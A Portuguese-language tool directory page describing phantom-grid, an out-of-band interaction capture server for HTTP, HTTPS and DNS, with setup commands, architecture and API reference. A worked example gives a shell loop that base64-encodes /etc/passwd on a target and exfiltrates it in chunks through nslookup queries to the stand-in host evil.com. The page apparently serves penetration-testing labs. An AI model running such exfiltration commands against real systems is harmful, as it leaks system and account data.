Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
phantom-grid — Alternativa gratuita ao Burp Collaborator - captura de interação OOB (HTTP/HTTPS/DNS) com SQLite e remontagem de exfiltração | Kitploit
Ferramentas/GitHubGitHub/evkir/phantom-grid
Geração de PayloadsAnálise de VulnerabilidadesExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesSegurança WebTestes de PenetraçãoUtilitários e FrameworksRed TeamingAnálise de DNS
GitHub
112há 1 mêsAinda não revisado
evkir/phantom-grid

phantom-grid

Alternativa gratuita ao Burp Collaborator - captura de interação OOB (HTTP/HTTPS/DNS) com SQLite e remontagem de exfiltração

Ver RepositórioSite

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Phantom Grid

⬡ Phantom Grid

Alternativa gratuita e de código aberto ao Burp Collaborator para laboratórios de testes de penetração
Captura de interações Out-of-Band (OOB) · HTTP/HTTPS · DNS · SQLite · Remontagem de exfiltração


O que é isto?

Phantom Grid é uma ferramenta auto-hospedada de captura de interações OOB (Out-of-Band) — uma alternativa gratuita ao Burp Collaborator para resolver laboratórios de testes de penetração (PortSwigger Web Security Academy, HackTheBox, TryHackMe, etc.).

Funcionalidades da v2.0

FuncionalidadeDescrição
Captura HTTP + HTTPSPilha dupla com certificados TLS autoassinados gerados automaticamente
Captura DNSServidor DNS integrado na porta 53
Remontagem de Exfiltração DNSRemontagem automática de fragmentos a partir de exfiltração DNS multipartida
Persistência SQLiteTodos os dados sobrevivem a reinicializações do servidor (modo WAL para desempenho)
40+ Modelos de PayloadSSRF, XXE, SQLi OOB, CMDi, SSTI, exfiltração DNS — prontos a copiar
Dashboard TáticoInterface de centro de comando com monitorização em tempo real
Pronto para DockerImplementação com um único comando
API RESTAPI completa de gestão de tokens/interações/exfiltração

Início Rápido

Opção 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

Opção 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

Opção 3: ngrok (para laboratórios sem VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

Arquitetura

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

Suporte HTTPS

As aplicações modernas bloqueiam frequentemente pedidos de conteúdo misto (http:// a partir de páginas https://). O Phantom Grid v2.0 executa HTTPS em conjunto com HTTP.

Certificado autoassinado gerado automaticamente

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

Certificado personalizado (Let's Encrypt, etc.)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

Com ngrok (HTTPS público instantâneo)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

Remontagem de Exfiltração DNS

O Phantom Grid remonta automaticamente dados de exfiltração DNS fragmentados. Isto é crítico para extrair payloads grandes que têm de ser divididos por múltiplas consultas DNS (etiquetas limitadas a 63 bytes).

Formatos Suportados

FormatoExemploCaso de Uso
Simplesdata.TOKEN.domainExfiltração de valor único
Indexado0.chunk1.TOKEN.domainSessão automática, fragmentos ordenados
Etiquetadosess1.0.chunk1.TOKEN.domainSessão nomeada com ordenação
Sinal de fimend.sess1.TOKEN.domainMarcar sessão como concluída

Exemplo: Exfiltrar /etc/passwd via DNS

No alvo:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

Ver dados remontados:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

Resposta:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

Persistência SQLite

Todos os dados são armazenados em phantom_grid.db usando o modo WAL do SQLite para desempenho de leitura/escrita concorrente.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

Os dados sobrevivem a reinicializações do servidor. Faça cópias de segurança copiando phantom_grid.db.


Referência da API

Tokens

MétodoEndpointDescrição
GET/api/tokensListar todos os tokens com estatísticas
POST/api/tokensCriar token {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>Atualizar etiqueta/notas do token
DELETE/api/tokens/<id>Eliminar token + todos os dados (CASCADE)

Interações

MétodoEndpointDescrição
GET/api/tokens/<id>/interactions?limit=&offset=Obter interações do token
DELETE/api/tokens/<id>/interactionsLimpar interações
GET/api/log?limit=Registo global (todos os tokens)
GET/api/poll?since=<ISO>Consultar novas interações

Exfiltração DNS

MétodoEndpointDescrição
GET/api/tokens/<id>/exfilObter sessões de exfiltração com dados remontados

Sistema

MétodoEndpointDescrição
GET/api/statsEstatísticas globais (contagens, tamanho da BD)
GET/healthVerificação de estado

Endpoints de Captura

Baixar ferramenta